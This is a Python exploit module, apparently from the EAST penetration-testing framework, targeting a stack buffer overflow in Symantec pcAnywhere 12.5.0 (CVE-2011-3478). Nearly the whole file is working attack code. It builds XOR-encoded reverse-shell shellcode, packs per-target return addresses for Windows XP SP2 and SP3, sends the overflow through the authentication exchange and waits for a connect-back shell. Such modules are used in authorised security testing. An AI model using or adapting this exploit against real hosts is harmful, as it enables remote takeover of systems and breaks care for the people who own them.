Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
125 lines (108 sloc) 4.43 KB
#! /usr/bin/env python
# -*- coding: utf_8 -*-
# The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution
import sys
import time
import socket
import struct
sys.path.append("./core")
sys.path.append("./shellcodes")
from Sploit import Sploit
from shellcodes.Shellcodes import OSShellcodes
INFO = {}
INFO['NAME'] = "ef_symantec_pcanywhere_host_rce"
INFO['DESCRIPTION'] = "Symantec pcAnywhere 12.5.0 - Remote Command Execution"
INFO['VENDOR'] = "https://www.symantec.com/"
INFO['DOWNLOAD_LINK'] = 'http://esdownload.symantec.com/akdlm/CD/MTV/pcAnywhere_12_5_MarketingTrialware.exe'
INFO['LINKS'] = 'https://www.exploit-db.com/exploits/38599/'
INFO["CVE Name"] = "2011-3478"
INFO["NOTES"] = """
The application's module used for handling incoming connections (awhost32.exe) contains a flaw. When handling authentication requests, the vulnerable process copies user provided input to a fixed length buffer without performing a length check.
Tested against Symantec pcAnywhere 12.5.0, WinXP Sp2 Eng and WinXP Sp3 Eng.
"""
INFO['CHANGELOG'] = "12 Nov, 2015. Written by Gleg team."
INFO['PATH'] = 'Exploits/General/'
OPTIONS = {}
OPTIONS["HOST"] = "127.0.0.1"
OPTIONS["PORT"] = "5631"
OPTIONS["TARGET"] = dict(options=["Wnd XP Sp2", "Wnd XP Sp3"], selected="Wnd XP Sp2")
class exploit(Sploit):
def __init__(self, host = "", port = 0, logger = None):
Sploit.__init__(self, logger = logger)
self.name = INFO['NAME']
self.host = host
self.port = port
self.addr = 0x24455CA
self.state = "running"
return
def args(self):
self.args = Sploit.args(self, OPTIONS)
self.host = self.args.get('HOST', self.host)
self.port = int(self.args.get('PORT', self.port))
target = self.args.get('TARGET', "Wnd XP Sp2")
if '3' in target:
self.addr = 0x27155CA
return
def chk(self):
try:
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((self.host, self.port))
except:
self.log("check reported no open socket")
return 1
self.log("check reported that service is steel alive")
return 0
def create_shellcode(self):
self.log("Generate shellcode started")
port = 4000
if self.args['listener']:
port = int(self.args['listener']['PORT'])
self.CONNECTBACK_PORT = port
os_system = os_target = "WINDOWS"
os_arch = '32bit'
shellcode_type = 'reverse'
s = OSShellcodes(os_target, os_arch, socket.gethostbyname(socket.gethostname()), self.CONNECTBACK_PORT, ["\x00"])
shellcode = s.create_shellcode(
shellcode_type,
encode='xor',
debug=1
)
self.log("Shellcode type: %s for arch: %s" % (shellcode_type, os_arch))
self.log("Length of shellcode: %d" % len(shellcode))
self.log("Generate shellcode finished")
return shellcode
def run(self):
self.args()
self.log("Attacking {}".format(self.host))
try:
shellcode = self.create_shellcode()
s = socket.socket()
if s.connect_ex((self.host, self.port)) == 0:
s.sendall('\x00\x00\x00\x00') #init
print s.recv(8192)
s.sendall('\x0D\x06\xFE')
time.sleep(1)
print s.recv(8192)
s.sendall('A' * 100) #send username
time.sleep(1)
self.log('Exploit address: ' + str(self.addr))
data = struct.pack('<L', self.addr) + 'AAAA' + struct.pack('<L', self.addr + 16) + '\x90\x90\x90\x90' + shellcode + 'B' * (1270 - len(shellcode))
data += struct.pack('<L', self.addr)
s.sendall(data)
time.sleep(5)
self.log('Waiting for callback connction')
s.close()
self.finish(True)
return 1
except:
self.log("failed!")
self.finish(False)
return 0
if __name__ == '__main__':
"""
By now we only have the tool mode for exploit..
Later we would have standalone mode also.
"""
print "Running exploit %s .. " % INFO['NAME']
e = exploit('', 80)
e.run()